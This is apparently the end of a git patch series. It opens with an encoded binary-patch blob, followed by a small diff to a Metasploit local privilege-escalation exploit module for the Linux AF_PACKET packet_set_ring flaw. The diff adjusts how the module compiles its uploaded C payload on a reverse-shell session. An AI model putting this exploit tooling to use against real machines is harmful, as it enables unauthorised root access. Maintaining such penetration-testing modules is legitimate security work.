z_O6Mbot|7@c4@AYjKep0!dRc+8D*Rxj7wJ*;ZbUJPEQ#-JjE&+;iIBl^#VsIhwd8^S1y^60a~T_7B`RjOXuIW8IyK9P@SO+Dmoa8lu1RfZIit6))< zG6dsoWXdRk9$+R9J=QDSg{UzNCAcBiQ=Y9Ny_lZdE%m`i8~QNNbtAjm4HVekcBp@2lGqIJ-)A)`is>ZUFNwE~H)BnKyDE_cx? zhr2Ahf~@5h78U1(W7!^0xx<%-C@6PPu!XTJ603`ZF<|qHvkNE?8X=*zdCvT7Z?THK zixp5BA$lbh$`IQ5WI?olr`&@&aC`ke3wr8wm& zG7eRa$%|&BPtTY{oq;Go1}#StL&!G-)Z7P1rG_w`shKk;re`{4PMMNro9mdHJ~7iq z%YraAQ?j_oM{}q-UvT0BFDEpSpPl12r=N>6o>0R@lx5S~OdK?AVNrll?#V55;C&kf z1Rk!|3tg!TMsFBGjM+rdmofJ<-jX9`D0IL)D~*2%x4?e)N?q9b}B>5{H9k zaiU|wF3Da6It7}yl+u?u|0^LdG%%}KXn=rRSdj}YIuvlp&A=I6KPxZo?GUi zp27=PkV5e;8Jz0A(=*AC@I0scrMURwIzS^{-BV#1aTODap)b$va^Q_BdFUCPoyj}` z)KlnFlQUiTp!=;&9N?h-ysJiJDy5?cN66ug5wiIbJtGqS2h=4C@4+ z=@Br8r5s#Q2XHK@CHlqX8;G>HKw-vGIWA~k2gIH4D0Sks85~@ce}tOw)%$oH^kyEU z6Pm|;lv5}sw0p|QEkM)=qP2x~fO^pjbkmAOrB3b!l`ZLudXccHV`S1i=L!a+?LNG%e>V=ip&r6%U3z*eMqW*RsP2QM<;NdSKahp8!v_lg+%tsvclDFhssE* zlc}v#4ea}%VI^;`;72Sa)fR_$Hj#^7)GBPVMzKY8rv;zznXy);8eKvw=OQ?2^k@g~ z0n~1YP+9=H-DMn-Du&hDrD#?NO+V(uKpm(!?xh3&2yPjX!mPxrRXSh88C}GSpfSEIzbXZ`N@EUxwYbP?G`Ka%!>x8 zC8ydDgaz-oi(l3l)8ZB-GvFO} zm>)0$V{OPQZE8_y#h|yNf9pTqU4?E*kc>xd2yjMqoJO_6yn_{m+7Qt;QQavazpL9S zys=Y@PrXW0!yfT22H_QPv`ZaC9i5#c7af1!(p8Q=F~QPPuEu9y`3gQ$&`U(R 
zob29nEN=7B&B&(ucHhNcpYRRDR`R_QJ-Td);8L&80G7~1-f^-|m-Gm-m4&TM?hwSop_nvewGn~!*g3K(NQ&oD+XDO z^Co2`oB5^-vmD+;o<7;Vb0M>tH)_onMJ$wU-nqOpeX&MLOse_1h(bkO89_C_Z(BuF z{3m&@yfeXKlfU8fRyq3J36?wM>UXV{7*##G?MgS9P0hIx@^N0 zRbYrlL!b5&vhArpvG~eD#B4s-u0<^Wg6(N?QLJh=;DO6oTiRePNnfXZk3aMFw)uS+ VeS<)H; Date: Thu, 17 May 2018 18:43:27 +0800 Subject: [PATCH 6/6] fix gcc on shell_reverse_tcp session --- .../linux/local/af_packet_packet_set_ring_priv_esc.rb | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb b/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb index 06b114a018..2b9e46225e 100644 --- a/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb +++ b/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb @@ -89,8 +89,12 @@ class MetasploitModule < Msf::Exploit::Local def upload_and_compile(path, data) upload "#{path}.c", data - output = cmd_exec "gcc -o #{path} #{path}.c" + gcc_cmd = "gcc -o #{path} #{path}.c" + if session.type.eql? 'shell' + gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}" + end + output = cmd_exec gcc_cmd unless output.blank? print_error output fail_with Failure::Unknown, "#{path}.c failed to compile"